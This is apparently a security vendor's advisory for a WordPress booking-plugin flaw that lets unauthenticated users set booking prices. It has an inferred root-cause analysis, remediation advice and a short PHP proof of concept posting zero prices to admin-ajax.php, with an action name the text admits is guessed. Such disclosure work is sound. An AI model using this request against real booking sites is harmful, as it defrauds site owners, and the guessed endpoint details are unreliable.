Published : August 9, 2026

CVE-2026-59532: Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment <= 2.7.2 Unauthenticated Price Maniputlation PoC, Patch Analysis & Rule

Severity Medium (CVSS 5.3)
CWE 20
Vulnerable Version 2.7.2
Patched Version
Disclosed July 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-59532 (metadata-based): This vulnerability allows unauthenticated attackers to manipulate the price of bookings in the Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment plugin for WordPress, versions up to and including 2.7.2. The severity is moderate, with a CVSS score of 5.3. The attack requires no authentication and no user interaction, but only impacts the integrity of the booking price, not confidentiality or availability.

Root Cause: The root cause is an Improper Input Validation issue (CWE-20). The plugin likely fails to validate or sanitize the price parameter submitted during the booking creation or checkout process. This is an inferred conclusion based on the CWE classification and the vulnerability description. Since no source code is available, Atomic Edge research cannot confirm the exact code path. The vulnerability likely resides in a custom AJAX handler or form processing function that accepts a price value from the client and uses it to calculate the booking total without server-side verification. An attacker can exploit this by intercepting the request and submitting a modified price, such as 0, to obtain a free or heavily discounted booking.

Exploitation: The attack vector is network-based, requiring no authentication. An attacker would interact with the plugin’s booking form or AJAX endpoints. The likely target is an AJAX action, such as `booking_and_rental_manager_for_woocommerce_save_booking`, or an endpoint that handles the booking finalization. The attacker would submit a request containing the booking details along with a manipulated price parameter. A realistic payload would involve altering the ‘total_price’ or ‘price’ field to ‘0’ while keeping the rest of the booking data valid. The request may also need to include a valid nonce if the plugin checks for one, but given the vulnerability, it is likely that the nonce check is absent or flawed. The attack can be performed using common tools like cURL or browser developer tools.

Remediation: The fix must validate all price-related inputs on the server-side. The plugin should not trust price data sent from the client. The recommended approach is to recalculate the booking price based on the selected items, their rates, and any applicable discounts or taxes. The plugin should also verify that the user has the appropriate permissions to apply discounts. In addition to fixing the price calculation, the plugin should implement proper nonce checks for all AJAX actions and form submissions to prevent unauthorized requests. Security best practices include using WordPress’s `sanitize_*` functions and validating all data against a strict whitelist of allowed values.

Impact: Successful exploitation allows an attacker to alter the price of a booking. This could result in financial losses for the site owner, as an attacker could book services or items for free or at a reduced cost. The impact is limited to price manipulation; there is no evidence of data exposure or privilege escalation. However, repeated exploitation could lead to significant financial fraud and undermine trust in the online booking system.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-59532 - Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment <= 2.7.2 - Unauthenticated Price Manipulation

$target_url = "https://example.com/wp-admin/admin-ajax.php"; // Set your target URL

// The AJAX action for the plugin. This is an inferred action name based on common WordPress plugin patterns.
$action = "booking_and_rental_manager_for_woocommerce_save_booking";

// Prices are set to 0 to demonstrate price manipulation.
$price = "0";
$total_price = "0";

// Sample booking data - modify as needed to match the plugin's expected fields.
$booking_data = array(
    'action' => $action,
    'product_id' => '123',
    'quantity' => '1',
    'start_date' => '2026-01-10',
    'end_date' => '2026-01-12',
    // The vulnerable parameters:
    'price' => $price,
    'total_price' => $total_price,
    // Other expected fields (e.g., user_id, etc.) can be added here.
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($booking_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Request sent. Response:n" . $response . "n";

?>

Frequently Asked Questions

Atomic Edge WAF security layer inspecting website traffic.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Black & McDonald logo representing Enterprise tier security and support for Atomic Edge WAF.Covenant House Toronto logo featuring a dove and text for Atomic Edge Enterprise planAlzheimer Society Canada logo representing trusted organizations and security partners.University of Toronto logo representing trusted organizations using Atomic Edge WAFSpecsavvers logo, trusted developers and organizations using Atomic Edge securityHarvard Medical School logo representing trusted organizations using Atomic Edge WAF.